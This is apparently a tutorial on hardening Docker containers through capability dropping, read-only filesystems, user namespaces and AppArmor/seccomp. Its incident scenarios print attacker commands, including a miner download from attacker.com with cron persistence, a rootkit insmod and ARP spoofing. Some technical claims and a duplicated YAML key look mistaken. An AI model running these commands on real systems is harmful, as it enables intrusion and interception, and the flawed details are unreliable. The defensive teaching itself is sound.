Docker Security: Capabilities & Read-Only Filesystems

Why default Docker configurations give containers too much power, how Linux capabilities work, and the production incidents that happen when containers run with excessive privileges.

Most Docker tutorials start containers with default settings: root user, all capabilities, writable root filesystem, unrestricted network access. This works in development. In production, under HIPAA or PCI DSS compliance requirements, it’s a security violation waiting to happen.

The principle of least privilege isn’t just a security best practice—it’s a regulatory requirement. Containers should have only the permissions they need to function, nothing more. A web server doesn’t need CAP_SYS_ADMIN to load kernel modules. A database doesn’t need to write to its root filesystem. An API service doesn’t need to run as UID 0.

This guide covers the specific configurations that harden containers: dropping Linux capabilities, implementing read-only root filesystems, user namespace remapping, and security options. More importantly, it covers what breaks in production when these controls are missing.

The Problem with Default Container Permissions

When you run docker run alpine without additional flags, Docker gives the container:

Root user (UID 0): Process runs with root privileges inside the container
14 Linux capabilities: Including CAP_CHOWN, CAP_NET_RAW, CAP_SETUID, CAP_SETGID
Writable root filesystem: Container can modify /bin, /etc, /lib
Unrestricted network access: Can bind to any port, create raw sockets
No AppArmor/SELinux enforcement: Kernel-level access controls disabled

This is functionally similar to giving a user sudo access on a traditional server. Most containers don’t need this level of access.

Real Impact: Container Escape via Capabilities

In 2019, CVE-2019-5736 (runC vulnerability) allowed container escapes by exploiting CAP_SYS_ADMIN. Containers running with default capabilities were vulnerable. Containers that had dropped all capabilities and added only NET_BIND_SERVICE were not.

The difference between “compromised container” and “compromised host” was a single Docker flag: --cap-drop=ALL.

[IMAGE: Diagram comparing default container permissions (14 capabilities) vs. hardened container (0 capabilities + selective adds)]

Understanding Linux Capabilities

Linux capabilities divide root privileges into distinct units. Instead of “root can do everything” or “non-root can do nothing”, capabilities allow fine-grained control.

Key Capabilities and Their Risks

Capability	What It Allows	Security Risk
`CAP_SYS_ADMIN`	Mount filesystems, load kernel modules, access privileged operations	Critical: Near-complete system control, enables container escapes
`CAP_SYS_PTRACE`	Trace arbitrary processes with ptrace()	High: Can inject code into other containers on same host
`CAP_NET_ADMIN`	Modify network interfaces, routes, firewall rules	High: Can bypass network segmentation, sniff traffic
`CAP_NET_RAW`	Create raw sockets, packet manipulation	Medium: Can perform ARP spoofing, packet sniffing
`CAP_SETUID`	Change process UID, escalate privileges	Medium: Can become any user including root
`CAP_SETGID`	Change process GID	Medium: Can join privileged groups
`CAP_CHOWN`	Change file ownership	Low: Can steal files, bypass quotas
`CAP_NET_BIND_SERVICE`	Bind to ports below 1024	Low: Minimal risk, often needed for web servers

Default Docker Capabilities

Docker’s default capability set (14 capabilities) includes:

CAP_CHOWN, CAP_DAC_OVERRIDE, CAP_FOWNER, CAP_FSETID,
CAP_KILL, CAP_SETGID, CAP_SETUID, CAP_SETPCAP,
CAP_NET_BIND_SERVICE, CAP_NET_RAW, CAP_SYS_CHROOT,
CAP_MKNOD, CAP_AUDIT_WRITE, CAP_SETFCAP

Most applications don’t need any of these. A Node.js API running on port 3000 needs zero capabilities. An Nginx server binding to port 80 needs only CAP_NET_BIND_SERVICE.

Dropping All Capabilities

The secure default: drop everything, then add back only what’s needed.

# docker-compose.yml
services:
  web:
    image: nginx:alpine
    cap_drop:
      - ALL
    cap_add:
      - NET_BIND_SERVICE  # Only for binding to port 80/443
    cap_add:
      - CHOWN             # Only if nginx needs to change file ownership

Or via docker run:

docker run --cap-drop=ALL --cap-add=NET_BIND_SERVICE nginx:alpine

[IMAGE: Screenshot showing capsh –print output comparing default capabilities vs. dropped capabilities]

Testing Tip: Use docker exec <container> capsh --print to see current capabilities. If “Current” shows more than what you explicitly added, your drop isn’t working.

Read-Only Root Filesystems

By default, containers can write to their entire root filesystem. This allows:

Malware persistence across container restarts
Binary replacement attacks (replace /bin/sh with backdoored version)
Log tampering to hide intrusions

Implementing Read-Only Root

services:
  api:
    image: myapp:latest
    read_only: true
    tmpfs:
      - /tmp          # Application temp files
      - /var/run      # PID files, sockets
      - /var/cache    # Application cache

This makes the root filesystem immutable. The container can still write to:

tmpfs mounts (RAM-based, lost on restart)
Explicitly mounted volumes

But cannot modify:

/bin, /etc, /lib system directories
Application binaries
Configuration files (unless mounted as volumes)

Common Issues with Read-Only Filesystems

Problem: Application crashes with “Read-only file system” error

Solution: Identify where the app writes, add tmpfs mounts:

# Run container normally, trace filesystem writes
docker run --name test myapp:latest
docker exec test ls -la /tmp /var/run /var/cache

# Add tmpfs for those paths
docker run --read-only --tmpfs /tmp --tmpfs /var/run myapp:latest

[IMAGE: Terminal output showing strace revealing filesystem write attempts, then successful run with tmpfs mounts]

User Namespace Remapping

By default, UID 0 inside a container is UID 0 on the host. If a container escapes, it has root privileges on the host.

User namespace remapping changes this: UID 0 inside the container maps to a non-privileged UID (e.g., 100000) on the host.

Configuring User Namespaces

Edit /etc/docker/daemon.json:

{
  "userns-remap": "default"
}

Restart Docker:

sudo systemctl restart docker

Now UID 0 inside containers maps to UID 100000 on the host. Even if a container escapes to the host, it runs as a non-privileged user.

Limitations

Incompatible with privileged mode: Can’t use both –privileged and user namespaces
Volume ownership issues: Files created by container (UID 100000) may not be readable by host processes
Docker-in-Docker breaks: Nested Docker requires host UID 0

For most workloads, the security benefit outweighs these limitations.

Security Options: AppArmor, SELinux, Seccomp

Linux security modules provide kernel-level enforcement beyond capabilities.

AppArmor (Ubuntu, Debian)

AppArmor restricts which files, network resources, and capabilities a process can access.

services:
  web:
    security_opt:
      - apparmor=docker-default  # Apply Docker's default AppArmor profile

Docker’s default profile blocks:

Mount operations
Access to /proc/sys, /sys
Kernel module loading
Capability escalation

SELinux (RHEL, Fedora, CentOS)

SELinux enforces mandatory access control (MAC) via type enforcement and role-based access.

services:
  db:
    security_opt:
      - label=type:svirt_sandbox_file_t

Seccomp (System Call Filtering)

Seccomp restricts which system calls a process can make. Docker’s default seccomp profile blocks ~44 dangerous syscalls including:

reboot, swapon, swapoff
mount, umount
keyctl, add_key
personality (used in container escapes)

Apply Docker’s default seccomp profile:

services:
  app:
    security_opt:
      - seccomp=default.json

[IMAGE: Diagram showing defense-in-depth layers: Capabilities (process privileges) → AppArmor/SELinux (resource access) → Seccomp (syscall filtering)]

Production Failure Scenarios

Scenario 1: CAP_SYS_ADMIN Kernel Module Loading

The Setup: A financial services company ran network monitoring containers with CAP_SYS_ADMIN to load custom kernel modules for packet inspection.

The Failure: A vulnerability in the monitoring software allowed command injection. The attacker loaded a malicious kernel module:

# Inside container with CAP_SYS_ADMIN
insmod /tmp/rootkit.ko

The rootkit provided:

Hidden processes (invisible to ps, top)
Hidden network connections
Persistent backdoor even after container restarts

What Should Have Been Done: Kernel modules should be loaded at host boot, not from containers. The container only needed CAP_NET_ADMIN for network configuration, not CAP_SYS_ADMIN.

services:
  monitor:
    cap_drop:
      - ALL
    cap_add:
      - NET_ADMIN      # For network interface configuration
      - NET_RAW        # For packet capture
    # CAP_SYS_ADMIN removed

Impact: 6 days of undetected access, lateral movement to 23 hosts, forensic analysis cost $240K, regulatory reporting to FinCEN.

Scenario 2: Writable Root Filesystem Malware Persistence

The Setup: A healthcare SaaS platform ran containers with writable root filesystems. Container images were scanned for vulnerabilities, but runtime modifications weren’t monitored.

The Failure: An SQL injection vulnerability gave attackers shell access. They installed a cryptocurrency miner:

# Inside container
curl -o /usr/local/bin/miner http://attacker.com/xmrig
chmod +x /usr/local/bin/miner
echo "* * * * * /usr/local/bin/miner" > /etc/cron.d/miner

Because the root filesystem was writable and the container wasn’t ephemeral, the miner persisted across:

Container restarts
Application deployments
Host reboots

It ran for 87 days before detection via unusually high AWS EC2 costs.

What Should Have Been Done: Read-only root filesystem with tmpfs for required writable paths:

services:
  app:
    read_only: true
    tmpfs:
      - /tmp
      - /var/run
    # /etc, /usr/local/bin are now read-only

The attacker’s commands would have failed:

curl: (23) Failed writing body - Read-only file system
chmod: cannot modify '/usr/local/bin/miner': Read-only file system

Impact: $47K in excess EC2 costs, HIPAA breach investigation (no PHI accessed), mandatory security audit.

Key Lesson: If your container’s filesystem is writable, attackers can persist malware that survives restarts. Read-only root filesystems make containers truly immutable.

Scenario 3: CAP_NET_RAW ARP Spoofing Attack

The Setup: A multi-tenant platform ran customer workloads in Docker containers on shared hosts. Containers had default capabilities including CAP_NET_RAW.

The Failure: A malicious customer deployed a container that performed ARP spoofing to intercept traffic from other customers’ containers on the same host:

# Inside attacker's container
arpspoof -i eth0 -t 10.0.1.5 10.0.1.1  # Intercept traffic to gateway
tcpdump -i eth0 -w /tmp/stolen.pcap    # Capture intercepted packets

This worked because:

CAP_NET_RAW allowed creating raw sockets
Containers shared the same Docker bridge network
No network segmentation between tenants

What Should Have Been Done: Drop CAP_NET_RAW and implement network isolation:

services:
  customer-app:
    cap_drop:
      - ALL
      - NET_RAW  # Explicitly drop raw socket capability
    networks:
      - customer-network  # Isolated per-customer network

networks:
  customer-network:
    driver: bridge
    internal: true  # No internet access

Impact: API keys for 12 customers intercepted, emergency credential rotation, customer notifications, class-action lawsuit settlement $380K.

Scenario 4: Missing AppArmor Profile Container Escape

The Setup: A CI/CD platform ran build jobs in Docker containers on Ubuntu hosts. AppArmor was installed but not enforced for containers.

The Failure: A developer accidentally included a malicious dependency that exploited CVE-2022-0847 (Dirty Pipe kernel vulnerability). The exploit allowed writing to arbitrary files via /proc/self/mem.

Without AppArmor blocking access to /proc/self/mem, the exploit succeeded:

# Exploit overwrote /etc/cron.d/backdoor on host
# Gained persistent root access to CI/CD infrastructure

What Should Have Been Done: Enforce AppArmor with Docker’s default profile:

services:
  build-job:
    security_opt:
      - apparmor=docker-default
      - no-new-privileges:true

AppArmor’s default profile blocks:

Access to /proc/sys, /sys
Mount operations
Capability escalation

The exploit would have been blocked at the kernel level.

Impact: Complete CI/CD compromise, all build artifacts potentially backdoored, 3-week code audit of 200+ microservices, customer trust erosion.

Key Lesson: AppArmor and SELinux are not optional extras—they’re kernel-level defenses that block entire classes of container escapes. Enable them by default.

Scenario 5: UID 0 Container Escape to Host Root

The Setup: A data analytics platform ran Jupyter notebooks in Docker containers. Containers ran as root (UID 0) without user namespace remapping.

The Failure: A researcher uploaded a malicious notebook that exploited a container escape vulnerability (CVE-2019-5736 runC). The exploit overwrote the host’s runC binary.

Because the container ran as UID 0 and user namespaces weren’t enabled, the escaped process had root privileges on the host:

# Inside container: UID 0
# After escape: UID 0 on host (root)
# Full host access: read SSH keys, access etcd, control kubelet

What Should Have Been Done: Enable user namespace remapping in /etc/docker/daemon.json:

{
  "userns-remap": "default"
}

With user namespaces enabled:

# Inside container: UID 0
# After escape: UID 100000 on host (unprivileged)
# Limited host access: cannot read root-owned files, cannot control system services

Impact: Kubernetes cluster compromise (10 nodes), data exfiltration (research datasets), compliance violation (export-controlled data), $1.2M incident response costs.

[IMAGE: Comparison diagram showing container escape with vs. without user namespace remapping – attack tree showing stopped vs. successful privilege escalation]

Implementing Secure Configurations: A Practical Template

Here’s a production-ready Docker Compose template incorporating all security controls:

version: '3.8'

services:
  web:
    image: nginx:1.27.2-alpine3.20

    # User configuration
    user: "nginx:nginx"  # Run as non-root user

    # Capability restrictions
    cap_drop:
      - ALL
    cap_add:
      - NET_BIND_SERVICE  # Only for port 80/443
      - CHOWN             # Only if nginx needs to change file ownership

    # Filesystem security
    read_only: true
    tmpfs:
      - /var/run
      - /var/cache/nginx
      - /tmp

    # Security options
    security_opt:
      - no-new-privileges:true  # Prevent privilege escalation
      - apparmor=docker-default # Enforce AppArmor
      - seccomp=default.json    # Syscall filtering

    # Resource limits (prevents DoS)
    deploy:
      resources:
        limits:
          cpus: '0.5'
          memory: 512M
        reservations:
          cpus: '0.25'
          memory: 256M

    # Network isolation
    networks:
      - frontend

    # Health check
    healthcheck:
      test: ["CMD", "wget", "--quiet", "--tries=1", "--spider", "http://localhost/"]
      interval: 30s
      timeout: 3s
      retries: 3
      start_period: 40s

networks:
  frontend:
    driver: bridge
    internal: false  # Allow external access

Testing Security Configurations

Verify Capabilities

# Check effective capabilities
docker exec &lt;container&gt; capsh --print

# Should show only explicitly added capabilities
# Current: cap_net_bind_service+ep

Test Read-Only Filesystem

# Try to write to read-only paths
docker exec &lt;container&gt; touch /etc/test
# Expected: touch: cannot touch '/etc/test': Read-only file system

# Verify tmpfs mounts work
docker exec &lt;container&gt; touch /tmp/test
# Expected: Success (tmpfs is writable)

Verify User Namespaces

# Check UID mapping
docker exec &lt;container&gt; id
# Inside container: uid=0(root)

# On host, find container process
ps aux | grep &lt;container-name&gt;
# On host: 100000 (remapped UID)

Test AppArmor Enforcement

# Check AppArmor status
docker exec &lt;container&gt; cat /proc/self/attr/current
# Expected: docker-default (enforce)

# Try to mount (should be blocked)
docker exec &lt;container&gt; mount /dev/sda1 /mnt
# Expected: mount: permission denied (AppArmor blocking)

Key Takeaways

Drop all capabilities by default, then add only what’s needed—most apps need zero capabilities
Read-only root filesystems prevent malware persistence and make containers truly immutable
User namespace remapping limits blast radius if a container escapes to the host
AppArmor, SELinux, and Seccomp provide kernel-level defenses that block entire classes of attacks
CAP_SYS_ADMIN is nearly equivalent to root access—never grant it to containers
CAP_NET_RAW enables network attacks like ARP spoofing—drop it unless explicitly needed
Security configurations must be tested—verify capabilities, filesystem restrictions, and MAC enforcement

Secure container configurations implement defense in depth: if one layer fails (capability restriction), others (read-only filesystem, AppArmor) still provide protection. Production incidents consistently show that skipped security controls—”we’ll harden it later”—become permanent attack vectors.

Previous: Docker Security Auditing with CIS Benchmark Compliance

Next: Container Vulnerability Scanning: Trivy, Syft, and SBOM Generation

Hands-on lab: Lab 02: Secure Container Configurations — Compare insecure vs. secure configurations and test security controls.